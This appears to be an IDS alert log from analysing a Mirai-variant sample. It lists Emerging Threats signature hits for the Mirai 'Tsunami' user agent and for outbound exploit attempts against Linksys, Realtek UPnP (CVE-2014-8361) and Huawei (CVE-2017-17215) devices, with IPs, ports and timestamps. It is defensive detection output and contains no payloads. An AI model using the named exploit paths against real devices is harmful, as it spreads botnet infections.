ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.174.97.233

Timestamp:	192.168.2.2395.174.97.23347994802027121 05/14/22-02:13:32.979753
SID:	2027121
Source Port:	47994
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.58.79.125

Timestamp:	192.168.2.2395.58.79.12560124802027121 05/14/22-02:12:23.981113
SID:	2027121
Source Port:	60124
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.167.204

Timestamp:	192.168.2.23172.65.167.20434184555552027153 05/14/22-02:13:44.962414
SID:	2027153
Source Port:	34184
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.80.201.238

Timestamp:	192.168.2.2395.80.201.23847450802027121 05/14/22-02:12:16.046839
SID:	2027121
Source Port:	47450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.51.73

Timestamp:	192.168.2.2395.159.51.7337054802027121 05/14/22-02:12:08.430878
SID:	2027121
Source Port:	37054
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.241.123.157

Timestamp:	192.168.2.23156.241.123.15756836528692027339 05/14/22-02:12:54.094946
SID:	2027339
Source Port:	56836
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.141.200.194

Timestamp:	192.168.2.2395.141.200.19460076802027121 05/14/22-02:12:21.758371
SID:	2027121
Source Port:	60076
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.185.50

Timestamp:	192.168.2.2395.101.185.5038634802027121 05/14/22-02:12:38.371591
SID:	2027121
Source Port:	38634
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.241.84.240

Timestamp:	192.168.2.23156.241.84.24033824528692027339 05/14/22-02:12:28.673321
SID:	2027339
Source Port:	33824
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.143.203

Timestamp:	192.168.2.2395.179.143.20351242802027121 05/14/22-02:12:18.506552
SID:	2027121
Source Port:	51242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.0.30.56

Timestamp:	192.168.2.2395.0.30.5660942802027121 05/14/22-02:13:00.841883
SID:	2027121
Source Port:	60942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.86.72.58

Timestamp:	192.168.2.2395.86.72.5855354802027121 05/14/22-02:13:14.880883
SID:	2027121
Source Port:	55354
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.97.138.226

Timestamp:	192.168.2.2395.97.138.22648964802027121 05/14/22-02:12:57.594704
SID:	2027121
Source Port:	48964
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.104.202

Timestamp:	192.168.2.23172.65.104.20234854555552027153 05/14/22-02:13:36.964682
SID:	2027153
Source Port:	34854
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.219.168

Timestamp:	192.168.2.23172.65.219.16846204555552027153 05/14/22-02:13:08.554661
SID:	2027153
Source Port:	46204
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.87.173.198

Timestamp:	192.168.2.2388.87.173.19839632802027121 05/14/22-02:13:19.388360
SID:	2027121
Source Port:	39632
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.81.184.184

Timestamp:	192.168.2.23172.81.184.18459304555552027153 05/14/22-02:13:40.473105
SID:	2027153
Source Port:	59304
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.77.28.155

Timestamp:	192.168.2.2395.77.28.15555294802027121 05/14/22-02:13:20.332969
SID:	2027121
Source Port:	55294
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.254.156

Timestamp:	192.168.2.23172.65.254.15633828555552027153 05/14/22-02:12:11.570207
SID:	2027153
Source Port:	33828
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.158.131

Timestamp:	192.168.2.2395.217.158.13150124802027121 05/14/22-02:12:16.061650
SID:	2027121
Source Port:	50124
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.114.91

Timestamp:	192.168.2.23172.65.114.9144870555552027153 05/14/22-02:12:34.796192
SID:	2027153
Source Port:	44870
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 184.105.8.214

Timestamp:	192.168.2.23184.105.8.21455800555552027153 05/14/22-02:12:52.633661
SID:	2027153
Source Port:	55800
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.44.240

Timestamp:	192.168.2.2395.101.44.24046514802027121 05/14/22-02:12:38.385188
SID:	2027121
Source Port:	46514
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.47.138.168

Timestamp:	192.168.2.2395.47.138.16839922802027121 05/14/22-02:12:47.737611
SID:	2027121
Source Port:	39922
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.209.147.143

Timestamp:	192.168.2.2395.209.147.14345778802027121 05/14/22-02:12:52.880233
SID:	2027121
Source Port:	45778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.6.166

Timestamp:	192.168.2.2395.100.6.16650622802027121 05/14/22-02:12:38.425801
SID:	2027121
Source Port:	50622
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.247.30.224

Timestamp:	192.168.2.23156.247.30.22451048528692027339 05/14/22-02:12:53.901304
SID:	2027339
Source Port:	51048
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.178.89

Timestamp:	192.168.2.2395.101.178.8946468802027121 05/14/22-02:11:57.639904
SID:	2027121
Source Port:	46468
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.244.233.150

Timestamp:	192.168.2.23197.244.233.15040306372152835222 05/14/22-02:11:51.051598
SID:	2835222
Source Port:	40306
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.65.107.220

Timestamp:	192.168.2.2395.65.107.22051454802027121 05/14/22-02:11:55.090650
SID:	2027121
Source Port:	51454
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.90.100.206

Timestamp:	192.168.2.2395.90.100.20642786802027121 05/14/22-02:13:06.577911
SID:	2027121
Source Port:	42786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.250.235.42

Timestamp:	192.168.2.2395.250.235.4243474802027121 05/14/22-02:11:52.862391
SID:	2027121
Source Port:	43474
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.61.201.124

Timestamp:	192.168.2.2395.61.201.12438168802027121 05/14/22-02:13:04.224191
SID:	2027121
Source Port:	38168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.249.225.18

Timestamp:	192.168.2.2388.249.225.1853758802027121 05/14/22-02:13:19.402088
SID:	2027121
Source Port:	53758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.245.25.106

Timestamp:	192.168.2.23172.245.25.10652588555552027153 05/14/22-02:13:19.821621
SID:	2027153
Source Port:	52588
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.103.126

Timestamp:	192.168.2.2395.216.103.12651132802027121 05/14/22-02:12:00.196178
SID:	2027121
Source Port:	51132
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.143.57.78

Timestamp:	192.168.2.2395.143.57.7852982802027121 05/14/22-02:12:04.729513
SID:	2027121
Source Port:	52982
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.244.70.102

Timestamp:	192.168.2.23156.244.70.10233740528692027339 05/14/22-02:13:13.435280
SID:	2027339
Source Port:	33740
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.59.176.82

Timestamp:	192.168.2.2395.59.176.8254556802027121 05/14/22-02:13:33.021265
SID:	2027121
Source Port:	54556
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.1.58

Timestamp:	192.168.2.2395.100.1.5849178802027121 05/14/22-02:11:48.348956
SID:	2027121
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.214.135.177

Timestamp:	192.168.2.2395.214.135.17752978802027121 05/14/22-02:12:04.793804
SID:	2027121
Source Port:	52978
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.46.195

Timestamp:	192.168.2.2395.101.46.19543134802027121 05/14/22-02:12:13.698098
SID:	2027121
Source Port:	43134
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.173.240

Timestamp:	192.168.2.2395.216.173.24048368802027121 05/14/22-02:12:21.633415
SID:	2027121
Source Port:	48368
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.241.182.147

Timestamp:	192.168.2.2395.241.182.14738286802027121 05/14/22-02:13:29.655470
SID:	2027121
Source Port:	38286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.168.228.205

Timestamp:	192.168.2.2395.168.228.20548254802027121 05/14/22-02:12:12.332916
SID:	2027121
Source Port:	48254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.127.32

Timestamp:	192.168.2.23172.65.127.3248576555552027153 05/14/22-02:12:11.570325
SID:	2027153
Source Port:	48576
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.246.204.45

Timestamp:	192.168.2.23197.246.204.4543450372152835222 05/14/22-02:12:18.232296
SID:	2835222
Source Port:	43450
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.246.123

Timestamp:	192.168.2.23172.65.246.12360432555552027153 05/14/22-02:13:32.017204
SID:	2027153
Source Port:	60432
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.34.126

Timestamp:	192.168.2.2395.100.34.12649942802027121 05/14/22-02:12:08.354729
SID:	2027121
Source Port:	49942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.187.187

Timestamp:	192.168.2.23172.65.187.18739546555552027153 05/14/22-02:12:18.490698
SID:	2027153
Source Port:	39546
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.202.218

Timestamp:	192.168.2.2395.217.202.21857140802027121 05/14/22-02:12:33.688142
SID:	2027121
Source Port:	57140
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.244.117.67

Timestamp:	192.168.2.23156.244.117.6735262528692027339 05/14/22-02:13:29.101550
SID:	2027339
Source Port:	35262
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.9.132.130

Timestamp:	192.168.2.2395.9.132.13054534802027121 05/14/22-02:12:09.942371
SID:	2027121
Source Port:	54534
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.207.172

Timestamp:	192.168.2.23172.65.207.17255164555552027153 05/14/22-02:12:51.455000
SID:	2027153
Source Port:	55164
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.235.102.246

Timestamp:	192.168.2.23156.235.102.24651258528692027339 05/14/22-02:12:57.282371
SID:	2027339
Source Port:	51258
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.165.81

Timestamp:	192.168.2.23172.65.165.8142906555552027153 05/14/22-02:12:20.938959
SID:	2027153
Source Port:	42906
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.220.230

Timestamp:	192.168.2.23172.65.220.23039706555552027153 05/14/22-02:13:40.490274
SID:	2027153
Source Port:	39706
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.211.206.80

Timestamp:	192.168.2.2395.211.206.8055016802027121 05/14/22-02:12:21.658731
SID:	2027121
Source Port:	55016
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.59.17.54

Timestamp:	192.168.2.2395.59.17.5441456802027121 05/14/22-02:12:57.823951
SID:	2027121
Source Port:	41456
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.76.246.196

Timestamp:	192.168.2.2395.76.246.19645190802027121 05/14/22-02:12:09.885059
SID:	2027121
Source Port:	45190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.209.155.90

Timestamp:	192.168.2.2395.209.155.9051672802027121 05/14/22-02:11:50.439816
SID:	2027121
Source Port:	51672
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.232.204

Timestamp:	192.168.2.23172.65.232.20460168555552027153 05/14/22-02:13:25.199760
SID:	2027153
Source Port:	60168
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.77.146

Timestamp:	192.168.2.2395.100.77.14644630802027121 05/14/22-02:12:01.373432
SID:	2027121
Source Port:	44630
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.31.227

Timestamp:	192.168.2.23172.65.31.22744132555552027153 05/14/22-02:11:53.487585
SID:	2027153
Source Port:	44132
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.72.0

Timestamp:	192.168.2.2395.57.72.060930802027121 05/14/22-02:12:48.985965
SID:	2027121
Source Port:	60930
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.45.155

Timestamp:	192.168.2.2395.101.45.15553358802027121 05/14/22-02:12:04.731576
SID:	2027121
Source Port:	53358
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.87.101.101

Timestamp:	192.168.2.2395.87.101.10137896802027121 05/14/22-02:12:09.913804
SID:	2027121
Source Port:	37896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.128.236

Timestamp:	192.168.2.2395.101.128.23660108802027121 05/14/22-02:13:28.455410
SID:	2027121
Source Port:	60108
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.142.205.94

Timestamp:	192.168.2.2395.142.205.9451290802027121 05/14/22-02:11:46.047218
SID:	2027121
Source Port:	51290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.193.167.167

Timestamp:	192.168.2.2388.193.167.16734318802027121 05/14/22-02:13:46.134686
SID:	2027121
Source Port:	34318
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.70.197.198

Timestamp:	192.168.2.2395.70.197.19856656802027121 05/14/22-02:12:31.405561
SID:	2027121
Source Port:	56656
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.164.53

Timestamp:	192.168.2.23172.65.164.5346232555552027153 05/14/22-02:13:23.081529
SID:	2027153
Source Port:	46232
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.225.205.130

Timestamp:	192.168.2.2395.225.205.13049890802027121 05/14/22-02:12:04.853611
SID:	2027121
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.50.139

Timestamp:	192.168.2.2395.100.50.13952924802027121 05/14/22-02:12:08.365983
SID:	2027121
Source Port:	52924
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.241.125.91

Timestamp:	192.168.2.23156.241.125.9145474528692027339 05/14/22-02:12:41.657241
SID:	2027339
Source Port:	45474
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.9.125.143

Timestamp:	192.168.2.2395.9.125.14353942802027121 05/14/22-02:12:13.735890
SID:	2027121
Source Port:	53942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 156.232.92.247

Timestamp:	192.168.2.23156.232.92.24755310528692027339 05/14/22-02:12:25.129479
SID:	2027339
Source Port:	55310
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.90.154.229

Timestamp:	192.168.2.2395.90.154.22936880802027121 05/14/22-02:12:12.602828
SID:	2027121
Source Port:	36880
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.15.130

Timestamp:	192.168.2.2395.216.15.13056598802027121 05/14/22-02:12:21.676533
SID:	2027121
Source Port:	56598
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.142.10.212

Timestamp:	192.168.2.2395.142.10.21251574802027121 05/14/22-02:12:25.898635
SID:	2027121
Source Port:	51574
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.110.175.27

Timestamp:	192.168.2.2395.110.175.2748086802027121 05/14/22-02:11:50.439638
SID:	2027121
Source Port:	48086
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.216.36.213

Timestamp:	192.168.2.2395.216.36.21353936802027121 05/14/22-02:12:03.575828
SID:	2027121
Source Port:	53936
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.218.175

Timestamp:	192.168.2.2395.101.218.17560614802027121 05/14/22-02:12:33.782516
SID:	2027121
Source Port:	60614
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.140.158.28

Timestamp:	192.168.2.2395.140.158.2838122802027121 05/14/22-02:11:46.150628
SID:	2027121
Source Port:	38122
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.163.132.24

Timestamp:	192.168.2.2395.163.132.2455816802027121 05/14/22-02:11:52.586510
SID:	2027121
Source Port:	55816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.206.173

Timestamp:	192.168.2.23172.65.206.17358940555552027153 05/14/22-02:12:01.300119
SID:	2027153
Source Port:	58940
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.177.137

Timestamp:	192.168.2.23172.65.177.13744728555552027153 05/14/22-02:13:32.012600
SID:	2027153
Source Port:	44728
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.233.69

Timestamp:	192.168.2.2395.179.233.6956756802027121 05/14/22-02:11:48.288985
SID:	2027121
Source Port:	56756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.2.8

Timestamp:	192.168.2.23172.65.2.844980555552027153 05/14/22-02:12:11.570145
SID:	2027153
Source Port:	44980
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.117.69

Timestamp:	192.168.2.23172.65.117.6952368555552027153 05/14/22-02:13:43.822344
SID:	2027153
Source Port:	52368
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.159.7.41

Timestamp:	192.168.2.2395.159.7.4138836802027121 05/14/22-02:11:52.872714
SID:	2027121
Source Port:	38836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound - Source IP: 192.168.2.23 - Destination IP: 172.65.89.234

Timestamp:	192.168.2.23172.65.89.23448884555552027153 05/14/22-02:12:00.125203
SID:	2027153
Source Port:	48884
Destination Port:	55555
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.57.98.210

Timestamp:	192.168.2.2395.57.98.21044138802027121 05/14/22-02:13:14.994328
SID:	2027121
Source Port:	44138
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.110.232.97

